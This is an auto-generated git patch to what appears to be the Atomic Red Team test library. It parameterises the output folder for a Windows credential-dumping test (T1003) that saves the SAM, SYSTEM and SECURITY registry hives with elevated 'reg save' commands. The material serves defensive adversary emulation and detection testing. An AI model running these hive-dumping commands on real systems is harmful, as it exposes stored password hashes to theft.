From 135c516a080b80c380fcdecdc211c27ea458dcba Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 30 Dec 2019 15:06:51 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs
 branch=master

---
 atomics/T1003/T1003.md | 17 +++++++++++------
 atomics/index.yaml     | 17 +++++++++++------
 2 files changed, 22 insertions(+), 12 deletions(-)

diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 6dd78aea..28f30ecd 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -229,19 +229,24 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
 **Supported Platforms:** Windows
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| output_folder | Output folder path | Path | C:\Windows\Temp|
+
 #### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
 ```
-reg save HKLM\sam sam
-reg save HKLM\system system
-reg save HKLM\security security
+reg save HKLM\sam "#{output_folder}\sam"
+reg save HKLM\system "#{output_folder}\system"
+reg save HKLM\security "#{output_folder}\security"
 ```
 
 
 #### Cleanup Commands:
 ```
-rm sam
-rm system
-rm security
+rm "#{output_folder}\sam"
+rm "#{output_folder}\system"
+rm "#{output_folder}\security"
 ```
 
 <br/>
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 936f6a7f..94299cf0 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -19468,17 +19468,22 @@ credential-access:
         via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
       supported_platforms:
       - windows
+      input_arguments:
+        output_folder:
+          description: Output folder path
+          type: Path
+          default: C:\Windows\Temp
       executor:
         name: command_prompt
         elevation_required: true
         command: |
-          reg save HKLM\sam sam
-          reg save HKLM\system system
-          reg save HKLM\security security
+          reg save HKLM\sam "#{output_folder}\sam"
+          reg save HKLM\system "#{output_folder}\system"
+          reg save HKLM\security "#{output_folder}\security"
         cleanup_command: |
-          rm sam
-          rm system
-          rm security
+          rm "#{output_folder}\sam"
+          rm "#{output_folder}\system"
+          rm "#{output_folder}\security"
     - name: Dump LSASS.exe Memory using ProcDump
       description: |
         The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals